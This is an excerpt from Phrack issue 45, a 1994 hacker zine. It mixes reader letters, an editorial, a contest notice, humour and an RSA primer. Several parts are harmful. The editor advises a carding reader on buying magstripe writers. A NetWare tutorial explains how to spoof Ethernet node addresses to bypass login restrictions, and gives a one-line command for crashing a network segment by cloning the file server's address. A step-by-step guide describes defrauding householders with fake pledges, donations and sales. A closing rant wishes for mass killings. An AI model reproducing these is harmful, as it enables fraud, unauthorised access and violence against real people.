~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -- Otto Sync -- [Thanks for the letter of appreciation! As far as contributions go, we are interested in anything and everything. For your scene file, just use some of the files on other countries as examples, and I'm sure yours will be fine. Don't worry about getting it to me in any hurry. Phrack 46 is 3 months away. :) ] ------------------------------------------------------------------------------ Hey, guyz! What happened to the magazine, I haven't seen any number after 43... In any case, send the stuff to me, as soon as possible. Preferably in some kind of compressed format. I have got here a small question. Firstly, I noticed that a number of hackers have E-Mail addresses such as *@phantom.com. Is it possible to get one just like this, or you've gotta be some kind of a masquotte? I myself am a god-fearing character, not hacking outside my own domain. I prefer to produce than to steal. However, I lack chatting and I lack money, but I wouldn't steal it. Just to get a different view - for you. Not every curious person has to be a criminal. Greetings, Verdura (aka Vegetable) [Phantom Access is a public access unix that you can get access to just by telnetting to phantom.com and applying as a new user. Yes, indeed, there are a lot of hackers on phantom.com. In fact, a large number of us ancient LOD types are on there. More than you would imagine, really. But it is open to the public, and anyone who cares to pay the usage fees can hang out. As far as back issues, I don't send them out to anyone. They are available for ftp from ftp.netsys.com in /pub/phrack as .zip files. I do make exceptions for people without ftp access, and will mail (US Mail) disks to whoever sends me postage to: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 ] ------------------------------------------------------------------------------ Dear phrack type person: I am working on a carding scheme involving stripe-writers. I have looked into getting one but it seems impossible to find someone to sell me one! I know publishing information like that is VERY stupid seeing as many government officials read phrack without paying for it. And many lamer asswipes read it to. That company would stop selling faster than a lamer on IRC gets kicked! I need any information on acquiring such a PERFECTLY LEGAL device because of the places I tried I could not find one that would sell me one! I also need any tips on magstipe encoding and atm machines available. I am adept in the circles of phreekdom and can call Boards if need be. And by the way this board I am mailing from has a dickhead for a sysop. I would mail from the public access internet site here, but They found my uid shells and kicked me off. They called the cops but being the most advanced police force in the nation they haven't a clue how to contact me. (the system only asks for you name to get an account) But now they require picture ID to get an account. It's a bitch but I have to get a fake ID and a fake parent. I was also attempting to DL cracker jack when They kicked me off and I would like to know were I could gopher for it or ftp if need be. I lost most internet access except gopher and mail from this crap board. ENCRYPT EVERYTHING cause the sysop sux. I would like to subscribe to phrack but this bastard would delete 1 meg of mail quite quickly unless it is small, zipped and uuencoded I guess. Well anyway I hope to hear from you. The government can have my encryption keys when they pry them from my cold dead hands. -Phiber Phreak [It's pretty hard to get such a magstripe writer, but the keyword here is MONEY. If you have money, they will sell you damn near anything. You may want to check Bank Technology News (800-835-8403 for subscription) as they have periodic vendor lists. Additionally you can ask them for a copy of their Card Industry Directory which will have all the info on suppliers that you could ever dream of. It has a 15 day trial period too, so read it, get what you need and return it (for a full refund). As far as Cracker Jack goes, get on #hack sometime and ask. I don't have a copy, but i imagine someone online will be able to DCC it to you.] ------------------------------------------------------------------------------ ==Phrack Magazine== Volume Five, Issue Forty-Five, File 3a of 28 **************************************************************************** I try my best to keep Phrack unbiased. For those of you who know me, you know that I am not the most soft-spoken individual in the world, and not being able to totally flame everyone and everything puts a great deal of stress on me. This editorial space is my one saving grace. In this I can spew out incredible amounts of crap and everyone should know that it is MY OPINION only. If anyone else wants to write a "guest" editorial, feel free to email it to phrack@well.com. --------------------- This issue I'm going to rant and rave about assholes on the net. You know who you are. You break into sites without any purpose, you delete files, you harass and annoy, you attempt blackmail, you fake mail, you fake news, you sling racial insults and you generally have nothing to offer the world. You are a disgrace to the hacker community. -------------------- There have always been confrontations online. It's unavoidable on the net, as it is in life, to avoid unpleasantness. However, on the net the behavior is far more pronounced since it effects a much greater response from the limited online environments than it would in the real world. People behind such behavior in the real world can be dealt with or avoided, but online they cannot. In the real world, annoying people don't impersonate you in national forums. In the real world, annoying people don't walk into your room and go through your desk and run through the town showing everyone your private papers or possessions. In the real world, people can't readily imitate your handwriting or voice and insult your friends and family by letter or telephone. In the real world people don't rob or vandalize and leave your fingerprints behind. The Internet is not the real world. All of the above continually happens on the Internet, and there is little anyone can do to stop it. The perpetrators know full well how impervious they are to retribution, since the only people who can put their activities to a complete halt are reluctant to open cases against computer criminals due to the complex nature of the crimes. The Internet still clings to the anarchy of the Arpanet that spawned it, and many people would love for the status quo to remain. However, the actions of a few miscreants will force lasting changes on the net as a whole. The wanton destruction of sites, the petty forgeries, the needless breakins and the poor blackmail attempts do not go unnoticed by the authorities. I personally could care less what people do on the net. I know it is fantasyland. I know it exists only in our minds, and should not have any long lasting effect in the real world. Unfortunately, as the net's presence grows larger and larger, and the world begins to accept it as an entity in and of itself, it will be harder to convince those inexperienced users that the net is not real. I have always played by certain rules and they have worked well for me in the nearly 15 years I've been online. These rules can best be summed up by the following quote, "We are taught to love all our neighbors. Be courteous. Be peaceful. But if someone lays his hands on you, send them to the cemetery." The moment someone crosses the line, and interferes with my well-being in any setting (even one that is arguably unreal such as the Internet) I will do whatever necessary to ensure that I can once again go about minding my own business unmolested. I am not alone in this feeling. There are hundreds of net-loving anarchists who don't want the extra attention and bad press brought to our little fantasyland by people who never learned how to play well as children. Even these diehard anti-authoritatians are finding themselves caught in a serious quandary: do they do nothing and suffer attacks, or do they make the phone call to Washington and try to get the situation resolved? Many people cannot afford the risk of striking back electronically, as some people may suggest. Other people do not have the skill set needed to orchestrate an all out electronic assault against an unknown, even if they pay no heed to the legal risk. Even so, should anyone attempt such retribution electronically, the assailant will merely move to a new site and begin anew. People do not like to deal with police. No one LOVES to call up their local law enforcement office and have a nice chat. Almost everyone feels somewhat nervous dealing with these figures knowing that they may just as well decide to turn their focus on you rather than the people causing problems. Even if you live your life crime-free, there is always that underlying nervousness; even in the real world. However, begin an assault directed against any individual, and I guarantee he or she will overcome such feelings and make the needed phone call. It isn't the "hacking" per se that will cause anyone's downfall nor bring about governmental regulation of the net, but the unchecked attitudes and gross disregard for human dignity that runs rampant online. What good can come from any of this? Surely people will regain the freedom to go about their business, but what of the added governmental attentions? Electronic Anti-Stalking Laws? Electronic Trespass? Electronic Forgery? False Electronic Indentification? Electronic Shoplifting? Electronic Burglary? Electronic Assault? Electronic Loitering? Illegal Packet Sniffing equated as Illegal Wiretaps? The potential for new legislation is immense. As the networks further permeate our real lives, the continual unacceptable behavior and following public outcry in that setting will force the ruling bodies to draft such laws. And who will enforce these laws? And who will watch the watchmen? Oftimes these issues are left to resolve themselves after the laws have passed. Is this the future we want? One of increased legislation and governmental regulation? With the development of the supposed National Information Super-Highway, the tools will be in place for a new body to continually monitor traffic for suspect activity and uphold any newly passed legislation. Do not think that the ruling forces have not considered that potential. We are all in a serious Catch-22, brought about by a handful of sociopaths. When an unwanted future arises as a direct, or indirect, result of their actions, REMEMBER. From phrack@well.sf.ca.us Thu Mar 31 22:09:37 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18809; Thu, 31 Mar 94 22:09:10 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id WAA16789; Wed, 30 Mar 1994 22:56:10 -0800 Date: Wed, 30 Mar 1994 22:56:10 -0800 From: Chris Goggans Message-Id: <199403310656.WAA16789@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-04 Status: O ==Phrack Magazine== Volume Five, Issue Forty-Five, File 4 of 28 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART I ------------------------------------------------------------------------------ !! NEW PHRACK CONTEST !! Phrack Magazine is sponsoring a programming contest open to anyone who wishes to enter. Write the Next Internet Worm! Write the world's best X Windows wardialer! Code something that makes COPS & SATAN look like high school Introduction to Computing assignments. Make the OKI 1150 a scanning, tracking, vampire- phone. Write an NLM! Write a TSR! Write a stupid game! It doesn't matter what you write, or what computer it's for! It only matters that you enter! Win from the following prizes: Computer Hardware & Peripherals System Software Complete Compiler packages CD-ROMS T-Shirts Magazine Subscriptions and MANY MORE! STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE! Enter the PHRACK PROGRAMMING CONTEST! The rules are very simple: 1) All programs must be original works. No submissions of previously copyrighted materials or works prepared by third parties will be judged. 2) All entries must be sent in as source code only. Any programming language is acceptable. Programs must compile and run without any modifications needed by the judges. If programs are specific to certain platforms, please designate that platform. If special hardware is needed, please specify what hardware is required. If include libraries are needed, they should be submitted in addition to the main program. 3) No virii accepted. An exception may be made for such programs that are developed for operating systems other than AMIGA/Dos, System 7, MS-DOS (or variants), or OS/2. Suitable exceptions could be, but are not limited to, UNIX (any variant), VMS or MVS. 4) Entries may be submitted via email or magnetic media. Email should be directed to phrack@well.com. Tapes, Diskettes or other storage media should be sent to Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 5) Programs will be judged by a panel of judges based on programming skill displayed, originality, usability, user interface, documentation, and creativity. 6) Phrack Magazine will make no claims to the works submitted, and the rights to the software are understood to be retained by the program author. However, by entering, the Author thereby grants Phrack Magazine permission to reprint the program source code in future issues. 7) All Entries must be received by 12-31-94. Prizes to be awarded by 3-1-95. -------------------------INCLUDE THIS FORM WITH ENTRY------------------------- Author: Email Address: Mailing Address: Program Name: Description: Hardware & Software Platform(s) Developed For: Special Equipment Needed (modem, ethernet cards, sound cards, etc): Other Comments: ------------------------------------------------------------------------------ Novell NetWare & Ethernet address spoofing with ODI --------------------------------------------------- Just to save you from the boredom of Yet Another UNIX Security Weakness, here are some things to consider about Novell NetWare for your next Security Audit or Hacking session (depending on which side you are on). Novell claim to have over 20 million PCs using their network operating system, substantially more than the estimated 4 million TCP/IP systems worldwide. There are many reasons for its popularity and its 60 to 80% market share, one of which has been its relatively good security. NetWare has been one of the few widely available systems which offer some form of login encryption of accounts and passwords over the wire, as standard, unlike most of its rivals which send them out as plaintext, even if they are stored in an encrypted form eventually. Novell now offer RSA based public key encryption of the data as well. However, since it is so popular, there are likely to be plenty of systems out there which have not been upgraded to the latest versions and patch releases and which may be still be vulnerable to programs like KNOCK , the patched ATTACH command (published in HackTic 16/17 1992), or the University of Leiden's HACK (which has been published in issue 43 of PHRACK) Since the latest security features are implemented as NetWare Loadable Modules for NetWare 3x and 4x, but as Value Added Processes for NetWare 2x, which require the server to be brought down to install them, it is likely that there are many NetWare 2x systems which are still vulnerable I shall also assume that you are not on one of those wide open "box shift" installations where none of the security features have been switched on (try logging in as SUPERVISOR or GUEST without a password), all the programs and data are in a single SYS: volume and the Network Address of the cable is the default 00000001. Like any project, the more you know about your particular Novell LAN, the easier it gets to "explore". Login as GUEST or a normal account. Try to see who else is on the system e.g. USERLIST /A >c:\ulist.txt will give you a list of users currently logged in, with their Ethernet card addresses saved to a text file . Your current connection will be marked with an asterisk. If your system has 100 or more users, then any sane Supervisor will have used some form of logic when allocating the user's login accounts, probably based on personnel or id number, often including their initials. SYSCON with privilege is what you are aiming to be able to use, but even without any privileges, you can still use it to look at your own account, change your password etc. You can also see a list of all the other registered users. This should help you sort the accounts into normal and privileged accounts (obviously SUPERVISOR, but often there are SUPERVISOR equivalent accounts, or Work Group Manager accounts which stand out from the list). You are quite likely to see an account called something like TAPE_BACKUP or DATA_LOGGER, TRAINER, STUDENT1, STUDENT2 i.e. accounts which do not belong to individual humans. These often require abnormal security privileges e.g. normal users may have their connections broken by the WATCHDOG at say midnight, to ensure that they are not modifying files during the nightly tape backup. At an academic or industrial site, you are likely to find data logging PCs connected to instrumentation or machinery which needs to be monitored or controlled 24 hours a day. These PCs are likely to have 24 hour accounts which are not time restricted at weekends, for example. Since it is usually more practical to do tape backups (DAT or helical scan) from a separate, dedicated PC rather than from the fileserver itself (one tape unit might also back up several fileservers), these PCs are likely to use an account e.g. TAPE_BACKUP which is a SUPERVISOR equivalent. If you can get physical access to this sort of PC, either datalogger, or tape backup unit, you have a good chance of finding the password on the local drive C:, possibly in a file with Hidden and/or System attributes (have a look at the AUTOEXEC.BAT and see what it calls) The security aware Novell supervisors, will have set up any such accounts with an extra level of security which restricts logins to only those Ethernet addresses which have been specified. The really sensible ones will have made sure that any such machines are sited in physically secure areas, as well. Although this is a very good idea, from the security point of view, Novell have now provided a mechanism which allows you to get around this: the replacement for monolithic IPX/NETX called Open Datalink Interface (ODI) Novell's ODI, and its slower Microsoft equivalent Network Driver Interface Specification (NDIS), both work by putting a common layer of software between the hardware of the Network Interface Card and the rest of the MSDOS Redirector. This allows multiple protocol stacks and frame types to be bound to the same physical card e.g. IPX TCP/IP NETBeui DECnet Appletalk ---------------------------------------------- Link Support Layer ---------------------------------------------- Hardware Specific device driver e.g. NE2000 Thus, to start up NetWare on older systems, you had to generate a hardware specific version of IPX.EXE for your Ethernet card, IPX NETX Extra parameters were set in SHELL.CFG, now under ODI, things are a little bit more complex: LSL NE2000 IPXODI NETX The same parameters as in SHELL.CFG such as preferred server or machine type (if you have different versions of MSDOS for different types of PC) can be specified in NET.CFG. With ODI, there are more parameters for NET.CFG but the worrying/interesting one is the ability to specify a different MAC level address to that of your actual Ethernet card. It needs this ability to cope with TCP/IP or DECnet coexistence e.g. BUFFERS 100 MACHINE TYPE COMPAQ PREFERRED SERVER FINANCE NODE ADDRESS AA-00-04-00-12-34 Since this DECnet address does not depend on the "real" unique Ethernet address which has been burnt into the PROM on the card and is centrally registered (originally by Xerox, but now by the IEEE), this mechanism allows you to put a different Ethernet card address into NET.CFG, thereby fooling the Address Restriction security. e.g. NODE ADDRESS 02-60-80-12-34-56 This is where the data you gathered earlier with USERLIST and SYSCON becomes threatening/useful. Of course, if your target PC is on a different LAN segment, there may be Routers or intelligent hubs which restrict your ability to do this, or at least record attempts in a log files which can trace your activity, provided that suspicions are aroused before they are periodically wiped out. How much of a security threat this little work around constitutes depends on your specific site, but there is another danger/opportunity, namely that of a denial of service or nuisance attack on the LAN. If you set this connection parameter to be the same as that of another PC, the fileserver (Novell, DEC or UNIX) and the Ethernet has no way of preventing some packets intended for just one unique address going to the other, if they are both online at the same time. This usually results in PC hangs, incomplete closure of files, File Allocation Table problems (usually curable by running CHKDSK C: /F, but not within Windows or you will make things worse). If by accident or design, you set your PC to have the same address as the fileserver (Novell, DEC or UNIX) or a router, then you can cause havoc to the whole network segment (even before you have started to play your multiplayer DOOM Deathmatch !). This could be achieved with a simple command in the AUTOEXEC.BAT e.g. echo NODE ADDRESS fileserver Ethernet address >>C:\ODI\NET.CFG which will only take effect the next time the PC is re-booted (allowing a good headstart for the perpetrator) This could also be the payload of a virus, which would cause more havoc than simply trashing the hard disk of a single PC. This problem is due to the inherent design weaknesses of TCP/IP and DECnet, which were developed at a time when the number of mini-computers that they connected could be counted on your fingers,. DEC or Xerox or Prime etc sales teams could only have dreamed of selling thousands of mini computers to a single customer. Nowadays, thousands of PCs connected to central servers are quite common, and the problems of duplicate addresses is significant. These same features are what make Ethernet Packet Sniffing possible, which is what was behind the recent CERT warning and media hype about Internet password security, but that is a topic for another article. Otaku ------------------------------------------------------------------------------ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ SCAMMING DIFFERENT TECHNIQUES AND PROCEDURES BY: MARZ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Table of Contents: 1.0 Intro 1.1 Different types of scams 1.2 The right one for you 2.0 The Pledge scam 2.1 The Donation scam 2.2 The Selling scam 3.0 What to wear 3.1 Where to go 4.0 Thanks 1.0 The Intro First off I would like to say that this file is for entertainment only and that you really shouldn't do the stuff mentioned, and the writer doesn't take any responsibility for any of the crap people do. 1.1 Different types of scams Ok in this file I will tell you about 3 types of scams the Pledge scam, The Donation scam, and the Selling scam. There are many other scams out there which I will cover in future files for instance credit card scams although companies are trying harder and harder to prevent this it is still happening. 1.2 The right one for you Al right now every person is different so in turn so are scams and some people and scams don't mix to well for instance if you way 300 Pounds you cant really say you are the start cross country runner. So if you are 300 pounds say you are the start wrestler/football player. Also age plays a BIG factor if you are 30 years old you aren't going to pass to well for a high school football player (you always could say you flunked) and if you are 10 years old people aren't going to be to anxious to give you donations to save the Rain Forests. Al right I am going to start going into more detail about the right scam for you. Look at my little chart below: Age good scam ----- ----------- -10 | selling or pledge 11-17 | selling, pledge , or maybe even donations (if old looking) 18+ | selling and donations 2.0 The Pledge scam Al right this scam works great for kids still in school go around asking people (that don't live around you) to pledge money for you so your team can afford to go to the state meet or what ever. For example one I use is I go to peoples houses asking for donations in my Track teams Lap-athon saying that we will be running laps for 3 hours to raise money so we can go and compete in the state meet. I will ask people if they want to pledge a certain flat amount or if they would like to pay me for each individual lap. I will normally have printed out a sheet like the one bellow on my computer . Name Address Amount/lap Not only does having a sheet like that help you keep track of who bought your scam and who you need to collect from it makes the target (person your trying to scam) not worried like they might be if they see you writing it on a sheet of note book paper. Now then you have collected a list of people wiling to pledge you go back to the address you wrote down and tell them (for example you ran 91 laps in 3 hours) make sure your number is not totally out of per portion like I ran 150 laps in 3 hours. Also for some reason numbers like 50, 70, 80, 110 people don't like people like to see 41, 73, 127, etc.. don't ask me why but that's what I have noticed. Ok so you now are at the persons house and they ask if they can write a check oh shit not a check.. well there's a couple things you could do ask them if they could possibly make it cash ( Might make them suspicious) ask them to write it to your coach give them your name (VERY dangerous) or you could just give them a phony name and lose out. One time this happened to me a lady pledged me $.25 a lap (very high amount you won't get much of these) and I told her I ran 93 laps she believed me and wanted to make out a check for the amount which was about $23 at that time I just happened to be buying some computer equipment I knew the guy's name so I gave her that name and I paid for some of the equipment with that check. Like I said earlier a 300 pound guy isn't going to be convincing for running 90 some laps in 3 hours. So customize it to your self. 2.1 The Donation scam This scam works better for the older people out there just because people normally aren't to anxious to give a ten year old Twenty dollars to help save the whales. Ok with this scam you need to know what about what you are going to try to fake donations for so example if you are going to pose as a volunteer person to collect donations for saving the rain forest you better know something about rain forest, Be cause you never know when your going to run into that know it all rain forest hater who will try to debate why people should spend their money on saving some trees and such. It is a good idea to do some research on the field you will be portraying (read magazine and newspaper articles). Ok so now you have your idea and your ready to go..this is a scenario of how it might go: You: Hello sir/ma'am I represent the national foundation of Rain forest saving (try to use a real group name) we are currently searching for funding for our operations at saving the rain forests of the world would you be interested in donating some money for our cause? Them: Why do we need the rain forest? You: (just keep bullshitting along..) Them: OK, here's $20. (they also may say:) Them: Get the fuck off my property before I shoot your ass. (make sure that you don't raise a riot then but later that night go back and egg the hell out of the house..) This scam has some possibilities you could carry this on for along time and bring it to real higher levels if your willing to put in the time and effort. First thing would be to research your field EVEN more so you know almost EVERYTHING about it. Then you might want to create a little fake newsletter that you could offer subscriptions for slightly high amount. The possibilities are pretty much endless. 2.2 The Selling scam At least once everyone of us has had a salesperson come to our door selling stationary. Well have you ever thought of what a great possibility that would be. The first thing you want to do is call Olympic sales club (a big time stationary seller) you can get their catalog and selling kit for free at 800-777-8907. when you get that package it will have a catalog in it. familiarize yourself with it then go and hit some houses. This scam works great during early November (people buying cards for Christmas) well ask for cash when people pay for the stuff. they might request a phone number where to reach you just give them the number of the kid you really hate. With the kit you will receive a official order form write the order on the form so the people feel confident in you. And always remember to try to sell a product but don't kill it. This scam also has lots of possibilities. 3.0 What to wear Your choice of cloths can make or break your scam. Don't dress like scum or to fancy. If your trying to get people to donate money for the rain forest it would help to wear some sort of a shirt dealing with the earth and not your favorite heavy metal group shirt. 3.1 Where to go NEVER I repeat NEVER go scaming around where you are often at or you might get some crazed lunatic chasing after you with a shot gun wondering where his Christmas cards are. You will have a hard time explaining your self since its July. I find that the rich neighbor hoods are not as productive as the middle class. In the rich neighborhoods you will get fewer purchases but a little more when you get them. I also found that the richer people don't like to donate unless they get a lot of attention for it (why ya think they so rich). Stick to middle class areas not by you or your friends houses and you'll be fine. 4.0 Thanks Thanks goes out to the people dumb enough to give me money for any of my scaming operations. Later Marz Watch for future files on this and other subjects! ------------------------------------------------------------------------------ SHIT KICKIN' JIM IN S E A T T L E ! Hey boy! Shit Kickin Jim here. Just wanted to let ya'll know bout this place I have been vistin that is a total hell. Yep, that's right it's the so called "cuttin edge" of music. Bah! Seems to me it's a congregation of fake ass hippy types who weren't original to come up with something new on their own, so they just went and re-hashed what their parents did in the late 60's and 70's...And look what a bunch of assholes they turned out to be! Well here we go. First of all I'll let ya know whut I'm talkin bout when referin to ah seattle type. Me and this other good ole boy were sittin round drinkin Bud one night and came up with the following: DESCRIPTION OF SEATTLE PERSON ----------------------------- Greasy-Pearl Jam worshipin'-dog walkin'-flower sniffin'-sock and sandle wearin'-bead havin'-Grateful Dead listenin'-trail mix carryin'- granola bar eatin'-crunchy-touchy feely-antique clothes shoppin'- bicycle ridin'-VW bug drivin'-spring water drinkin'-micro-brewery tourin'- sensitive-car poolin'-Doc Martin wearin'-back pack haulin'-chain wallet carryin'-clove smokin'-espresso swillin'-tree huggin'-Greenpeace joinin'-whiteboy dreadlocked-liberal arts takin'-politically correct- terminal college student. Please, anyone feel free to add to this list. See how big we can make it! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Now kids I didn't come up with this here part, but it's totally great and I totally admire the hell out of who ever sent it to me. In order for UNIX(tm) to survive into the nineties, it must get rid of its intimidating commands and outmoded jargon, and become compatible with the existing standards of our day. To this end, our technicians have come up with a new version of UNIX, System VI, for use by the PC - that is, the "Politically Correct." Politically Correct UNIX System VI Release notes UTILITIES: "man" pages are now called "person" pages. Similarly, "hangman" is now the "person_executed_by_an_oppressive_regime." To avoid casting aspersions on our feline friends, the "cat" command is now merely "domestic_quadruped." To date, there has only been a UNIX command for "yes" - reflecting the male belief that women always mean yes, even when they say no. To address this imbalance, System VI adds a "no" command, along with a "-f[orce]" option which will crash the entire system if the "no" is ignored. The bias of the "mail" command is obvious, and it has been replaced by the more neutral "gendre" command. The "touch" command has been removed from the standard distribution due to its inappropriate use by high-level managers. "compress" has been replaced by the lightweight "feather" command. Thus, old information (such as that from Dead White European Males) should be archived via "tar" and "feather". The "more" command reflects the materialistic philosophy of the Reagan era. System VI uses the environmentally preferable "less" command. The biodegradable "KleeNeX" displaces the environmentally unfriendly "LaTeX". SHELL COMMANDS: To avoid unpleasant, medieval connotations, the "kill" command has been renamed "euthanise." The "nice" command was historically used by privileged users to give themselves priority over unprivileged ones, by telling them to be "nice". In System VI, the "sue" command is used by unprivileged users to get for themselves the rights enjoyed by privileged ones. "history" has been completely rewritten, and is now called "herstory." "quota" can now specify minimum as well as maximum usage, and will be strictly enforced. The "abort()" function is now called "choice()." TERMINOLOGY: >From now on, "rich text" will be more accurately referred to as "exploitive capitalist text". The term "daemons" is a Judeo-Christian pejorative. Such processes will now be known as "spiritual guides." There will no longer be a invidious distinction between "dumb" and "smart" terminals. All terminals are equally valuable. Traditionally, "normal video" (as opposed to "reverse video") was white on black. This implicitly condoned European colonialism, particularly with respect to people of African descent. UNIX System VI now uses "regressive video" to refer to white on black, while "progressive video" can be any color at all over a white background. For far too long, power has been concentrated in the hands of "root" and his "wheel" oligarchy. We have instituted a dictatorship of the users. All system administration functions will be handled by the People's Committee for Democratically Organizing the System (PC-DOS). No longer will it be permissible for files and processes to be "owned" by users. All files and processes will own themselves, and decided how (or whether) to respond to requests from users. The X Window System will henceforth be known as the NC-17 Window System. And finally, UNIX itself will be renamed "PC" - for Procreatively Challenged. ---- UNIX(tm) is a trademark of UNIX System Laboratories. Any similarity of names or attitudes to that of any person, living or dead, is purely coincidental. ------------------------------------------------------------------------------ The Basics of the public key cryptosystem In early days of computing information processors were extremely expensive, very big and only few people were qualified to operate them. The machines were isolated mechanical entities and in order to use them one had to access them through devices that were situated in the near vicinity of the computer itself. Securing access to the computer meant securing the building in which the computer was operating. The years passed and computers became smaller, cheaper and easier to operate. And they got faster. They were linked first in local and then in wide area networks and information and programs were put only on one machine which was accessible through the net by any other participant. To gain access meant simply to gain access to the network itself. That was ok as long as all participants were members of one company, university or institution. They generally had the same cause and generally knew each other by face. Today, the net spans continents and has an estimated 20 Million users. Information has to pass through several nodes before finally reaching its destination and when using a connectionless protocol these nodes may even change during one session. To the user flow of information is not transparent anymore and the need for cryptography has arisen. But in order to limit communication to a closed user group again these persons have to have one common keyword and furthermore this keyword has to be changed in intervals to ensure that if the key gets exposed harmful consequences can be minimized to a short period of time. But how is a new keyword to be send securely to this group through several (maybe hostile to their cause) nodes if one can not be sure that the key has not been compromised. A trapdoor one-way function is needed that allows for encryption of a message with a publicly available key AND that is not reversible, meaning, that only the rightful receiver of this message should be able to decode it with his personal key. One solution is a public key cryptosystem. The mathematical basis is the "Satz von Euler" that states that two numbers that are prime to another have only one greatest common measure - and that is 1. a^eul(n)=1(mod n) and (a,n)= 1 For a given prime (p) and the product of two prime numbers (p1*p2) the Euler function is eul(p)=p-1 and eul(p1*p2)=(p1-1)(p2-1). That in mind we now can begin making the keys: Two primes p1 and p2 are chosen and the product of p1 and p2 named n. (n=p1*p2). We then choose a number e that is prime to (p1-1)(p2-1). (e and (p1-1)(p2-1) have 1 as the greatest common measure and e should not be chosen to small). Furthermore we need d for decoding the message. D is defined as d=e^-1 * (mod(p1-1)(p2-1)). N and e are now the public key which is made available to everyone who wishes to send a coded message to us. P1, p2 and d are kept secret. The transmitter of a secret message first transforms his text into a number by using an common known algorithm. He could for example use the ASCII code for changing characters into numerical values. This message in numerical format we now call m. It gets encrypted by using the function c=m^e * n on it. The coded message (c) is now send to us via e-mail or whatever. We then decode the message by using the function m=c^d * n on it. An example using Mathematica: The primes p1 and p2 are created p1=Prime[1000005] (The 1000005th prime number) 15485941 p2=Prime[1000000] (The 1000000th prime number) 15485863 n=p1 * p2 239813160752083 (Part 1 (n) of the public key is being created) e=Random[Integer, {1000000,100000000}] 4699873 GCD[e,(p1-1)(p2-1)] 1 E is created by producing a random number between 1000000 and 100000000. Then we check if e and (p1-1)(p2-1) have 1 as the greatest common measure. If this is not the case then we have to take another e until the GCD is 1. (Part 2 (e) of the public key has been created) d=PowerMod[e,-1,(p1-1)(p2-1)] 213069977635177 m=1234567890 1234567890 This is the message c=PowerMod[m,e,n] 159750418407936 The sender of a message encodes it with both public parts of the key (e and n). C is now sent to the receiver. PowerMod[c,d,n] 1234567890 The receiver now decodes the message using the secret part d and the public part n of the key. The decoded message reads 1234567890 again. Now how would a potential attacker try to break our key ? He basically needs the primes p1 and p2. If he got those two numbers, calculating d is a simple matter. d=PowerMod[e,-1,(p1-1)(p2-1)] ... and e is part of the public key. And to get p1 and p2 this person would only have to factorize n. Lets demonstrate that using Mathematica again : n=239813160752083 FactorInteger[n]//Timing 239813160752083 {1.48 Second, {{15485863, 1}, {15485941, 1}}} That took 1.48 sec on my 486/DX2 66...not bad. But making the primes only a little bigger... a=Prime[100000100] b=Prime[100000110] n=a*b FactorInteger[n]//Timing 2038076783 2038077053 4153757523684360499 {62.12 Second, {{2038076783, 1}, {2038077053, 1}}} ...it took my hardware over 1 minute. And since there is no known polynomial algorithm for factorizing n - and none to be expected - it is not hard to imagine that making the primes p1 and p2 big enough will drive computing costs into astronomical dimensions. Naturally there are other ways to break the key. Someone could for example pose as us and send out his own keys in our name...or exploit weaknesses of the program - like primes that are not created at ABSOLUTE random. Or hold a gun at our head and make us give him the key - that might sound funny but is not unheard of (especially in the metaphorical grasp of Justitia - when someone sticks a court order in your face) Furthermore if the program we use to crypt our messages with is fairly common, our opponent could optimize his cracking programs or even have them hardwired. One example are chips that use the DES algorithm for crypting and decrypting. Or he could make the cracking programs run parallel on parallel computers, if he got the might and enough time to rig up a program. Simply put: Our behavior should match the computing power of potential code-crackers. If our message is of low importance (or obsolete in short time) a simple algorithm would suffice. But if much is at gain, we should take appropriate measures to secure our privacy. It's like tying to outrun a Ferrari on a cross-bike. On an highway you do not stand a chance ...but if you can force him on a mountain road or rough terrain (with changing algorithms and keys often) you might just outrun the mightiest codecracker. ------------------------------------------------------------------------------ The Truth about the Hacker Conspiracy The Hacker's Philosophy, and the reason why. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Written by: Maldoror (ChUrCH oF ThE Non-CoNFoRMiST) If you are ignorant, do not start reading this, because you will never finish. You will disagree with anything I say anyway, simply because I am not you. If you are a Pseudo Intellectual, start reading this, quit, and say you agree with everything I say, even though you don't understand it. If you are depressing, start reading, hopefully you will kill a lot of innocent people at a mainstream night club, and try to blame me. Hackers are and always have been, the force in trying to stop our own suffering existence. Since the universe was created, the true souls, (among the first to separate from the single soul of the universe) realized the infinite repetition of their own being, and that they were simply doing one thing upon their continuous recreation: suffer. The hackers have known that the world and it's universe have been created over and over again, doomed to merely destroy itself upon it's own recognition, or recognition by man. As man becomes aware of himself, he becomes aware also of desires: the desire to be god. The truth is that man IS God, and that everything created in this universe was created by man and his thoughts. Mans thoughts have become so out of control, that he has now created himself, and is continuing the creations with every day of control of the masses, and his own greedy dark thoughts. The hackers have since the beginning of time, passed along the message to the next creations in the forms of dreams, ideas, books, music (current 93, COIL, Dead can Dance, Skinny Puppy, etc) and even visions. The Bible itself, is a good example of the universal hack. The message we as hackers have been trying to get across for creation after creation, existence after existence, self recognition after self recognition, is that we are all suffering and that this eternal cycle of pain must be stopped at all cost. The only way to stop this suffering of self is to convince SELF that he is suffering and must stop creating. We are each divisions of one strong soul, one thinking soul, that soul is GOD. WE are GOD. We must all realize together that we are suffering. WE must stop suffering. WE must stop the suffering. WE must stop the recreation. YES. We must hack the universe and kill it. There is only one way out of the eternal suffering we have started and been part of for ever. We must stop the cycle. We must remove ourselves from the cycle, and we must remove the universe from this cycle. The hackers return again and again. The hackers leave messages for themselves in the future, which is the past, for there is no difference here anymore. Leave your message, and next time around, you will realize that what I am saying is true. The government has known of the conspiracy for existence after existence. The government is so afraid of the conspiracy, and our plot to end it's 